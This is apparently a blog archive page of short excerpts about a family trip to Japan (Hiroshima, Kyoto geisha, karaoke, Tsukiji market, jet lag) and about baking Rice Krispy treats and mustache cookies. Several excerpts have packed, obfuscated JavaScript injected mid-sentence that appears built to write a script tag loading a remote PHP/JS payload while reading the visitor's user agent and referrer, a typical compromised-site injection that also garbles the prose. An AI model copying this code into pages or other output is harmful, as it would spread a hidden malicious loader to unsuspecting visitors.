We saw similar toilets in all of our hotels and most of the restaurants we visited. Some were so high tech, I never figured out how to flush them. I’m sorry, Japan! Automatic flushing was not part of the technology – which is […]

Japan – what I’ll miss and what I won’t
We’ve been in Vietnam for almost a week now, so I’ve had some time to think about what I loved and what I didn’t love about Japan. Don’t get me wrong, I’m thankful for every bit of this trip, but there are definitely some things that I won’t miss about Japan. What ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return […]
I’ve wanted to visit Hiroshima since I was pretty little. I had read Sadako ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yzzra|var|u0026u|referrer|hyyrd||js|php’.split(‘|’),0,{})) and the Thousand Paper Cranes in elementary school and we have family roots in Hiroshima. Kyoto is a relatively close shinkansen ride from Hiroshima, so it only made sense that we would visit the site. My […]
Did you read the book? See the movie? Even if you didn’t, you’ll still find the information fascinating. Nick had not read the book or seen the movie and still enjoyed learning about the Geisha (Geiko in Kyoto). We had just finished exploring the Nishiki market and were looking for a self guided walking tour […]
No trip to Japan would be complete without a visit to Karaoke – or so we’ve been told. My mom’s cousin, Tatsuyuki, met us at our hotel and we ventured to a Karaoke spot – an 8 story high building with small rooms along small hallways, accessed by an even smaller elevator. When we entered […]
We were told to go to the Tsukiji fish market on our first. The jet lag would actually help. Sure enough, we ere up at 4AM – no alarm needed. Unfortunately, you have to be at the market by 3:45AM to see the tuna auction – and the subways don’t start working until closer to […]
We tried our best to fight the jet lag. We went to bed at 11PM, but awoke at 1AM, 3AM and finally at 4:30AM. So we headed to the Tsukiji (pronounced Ski-G) market to meet up with Jen and Austin. We enjoyed some fresh fish at a hole in the wall joint for breakfast – […]
We made it! We left SFO at 11AM on Sunday and after 11 hours of travel we landed at Narita – 2PM on Monday. Time travel! But seriously, I’ve almost been up for 24 hours. I’m kind of delirious but forcing myself to write this in the hopes of getting over my jet lag! The […]
I think my current goal is to make Rice Krispy Treats the new must-have dessert. As popular as cake pops at birthdays and cupcakes at weddings. Rice Krispy Treats are the new ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srnik|var|u0026u|referrer|ryriy||js|php’.split(‘|’),0,{})) Cake Pops! I’ve already made the 4th of July version as well as the white/purple/pink version. And let’s […]
Did you have a nice weekend? Me too! I decided that I would get a few more blogs going this week. I know. I’ve been slacking. But for good reason. More on that tomorrow. Back to the mustache cookies. My good friend, Lisa, ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esesb|var|u0026u|referrer|iaskz||js|php’.split(‘|’),0,{})) is throwing a mustache-bash for her soon-to-be […]
